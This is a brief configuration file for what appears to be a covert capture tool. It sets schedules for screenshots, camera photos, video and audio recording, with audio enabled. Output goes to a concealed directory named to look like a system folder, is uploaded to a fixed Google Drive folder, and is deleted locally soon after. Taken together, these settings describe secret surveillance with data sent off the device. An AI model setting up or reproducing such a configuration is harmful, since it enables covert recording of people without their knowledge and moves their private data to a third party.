#In seconds
#In seconds
refresh_config_interval=20
should_use_user_home_path=true
content_directory_path=/.windows/.tp/.data/.cache

capture_screen_shots=false
#In seconds
capture_screen_shot_interval=10
capture_screen_shot_fs_path=
image_compression_enabled=true

capture_photo=false
capture_photo_interval=5

capture_video=false
#In seconds
capture_video_interval=5
# Video file size in duration in seconds
video_file_length_in_duration=60
pause_video_interval=5

capture_audio=true
#In seconds
pause_audio_interval=5
#In seconds
audio_file_length_in_duration=60

## Apply for both Audio/ Video files
wait_before_delete_in_seconds=30

# GDrive enabled/disabled config
google_drive_upload_enabled=true
google_drive_folder_id=16MMMs1kzYmQtFv0tsFGhrx_BPOFBGYsh

